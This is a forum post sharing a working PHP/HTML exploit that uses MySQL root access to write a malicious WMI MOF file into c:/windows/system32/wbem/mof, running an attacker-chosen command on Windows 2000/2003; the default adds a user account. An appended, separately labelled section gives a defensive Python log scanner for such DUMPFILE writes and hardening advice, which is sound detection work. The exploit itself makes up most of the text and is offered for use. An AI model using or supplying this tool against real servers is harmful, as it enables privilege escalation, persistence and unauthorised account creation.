[PHP]Mysql-MOF Local Exploits

#1
When we get a webshell, we can use this script to escalate privileges.

However, we need a few things first:
1. MySQL root
2. Windows 2k or 2k3

Code:
<html>
<head><title>Win MOF Shell</title></head>
<body>
<form action="" method="post">
Host:<br/>
<input type="text" name="host" value="127.0.0.1:3306"><br/>
User:<br/>
<input type="text" name="user" value="root"><br/>
Pass:<br/>
<input type="password" name="pass" value=""><br/>
DBname:<br/>
<input type="text" name="dbname" value="mysql"><br/>
Cmd:<br/>
<input type="text" name="cmd" value="net user test test /add" size="35"><br/>
MofPath:<br/>
<input type="text" name="mofname" value="c:/windows/system32/wbem/mof/hacking.mof" size="35"><br/>
<input type="submit" value="Exploit"><br/>
</form>
</body>
</html>
<?php
if(isset($_REQUEST['host'])&&isset($_REQUEST['user'])&&isset($_REQUEST['dbname'])&&isset($_REQUEST['cmd'])&&isset($_REQUEST['mofname']))
{
$mysql_server_name=$_REQUEST['host'];
$mysql_username=$_REQUEST['user'];
if(isset($_REQUEST['pass']))
{
  $mysql_password=$_REQUEST['pass'];
}
else
{
  $mysql_password='';
}
$mysql_database=$_REQUEST['dbname'];
$cmdshell=$_REQUEST['cmd'];
$mofname=$_REQUEST['mofname'];
}
else
{
echo "Form Input not enough";
exit;
}
$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);
$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")
instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\\\\\Cimv2\";
Name  = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
   \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"
   \"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};
instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\";
};
instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($mysql_database,$conn);
$sql="select '$payload' into dumpfile '$mofname';";
if(mysql_query($sql))
{
echo "Exploit Success!!!";
}
mysql_close($conn);
?>
Reply
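
For defenders, an added example that is not part of the original post: the script depends on a MySQL account issuing `SELECT ... INTO DUMPFILE` into the `wbem/mof` directory, and that statement is visible in the server's query log. The function names and sample log lines below are constructed for illustration, and multi-line log entries are assumed to be joined into one statement each before scanning.

```python
import re

# Write target of SELECT ... INTO DUMPFILE/OUTFILE '<path>'
INTO_FILE = re.compile(r"into\s+(dumpfile|outfile)\s+'([^']+)'", re.IGNORECASE)
# WMI consumer classes that make a MOF execute code when its event filter fires
CONSUMERS = ("activescripteventconsumer", "commandlineeventconsumer")

def normalize(path):
    """Lower-case and unify forward/back slashes so path variants compare equal."""
    return re.sub(r"[\\/]+", "/", path.strip().lower())

def classify(statement):
    """Return a finding dict for one SQL statement, or None if it writes no file."""
    m = INTO_FILE.search(statement)
    if not m:
        return None
    target = normalize(m.group(2))
    reasons, low = [], statement.lower()
    if "/wbem/mof/" in target:
        reasons.append("write into the WMI MOF directory")
    if target.endswith(".mof"):
        reasons.append("MOF file extension")
    if any(c in low for c in CONSUMERS) and "__filtertoconsumerbinding" in low:
        reasons.append("payload binds an event filter to a script/command consumer")
    return {"verb": m.group(1).lower(), "target": target,
            "severity": "high" if reasons else "review", "reasons": reasons}

def scan(statements):
    """Return (entry_number, finding) for every statement that writes a file."""
    hits = [(n, classify(s)) for n, s in enumerate(statements, 1)]
    return [(n, f) for n, f in hits if f]

# Constructed sample entries (not taken from a real server)
SAMPLE = [
    "12 Query\tSELECT id, name FROM customers WHERE id = 7",
    "12 Query\tselect 'instance of ActiveScriptEventConsumer ... "
    "instance of __FilterToConsumerBinding' into dumpfile "
    "'c:/windows/system32/wbem/mof/hacking.mof'",
    "13 Query\tSELECT * FROM orders INTO OUTFILE 'D:\\\\export\\\\orders.csv'",
]

if __name__ == "__main__":
    for n, f in scan(SAMPLE):
        print(n, f["severity"], f["target"], "; ".join(f["reasons"]))
```

Restricting `secure_file_priv` to a dedicated export directory and keeping the FILE privilege away from application accounts removes the file-write primitive that this check flags.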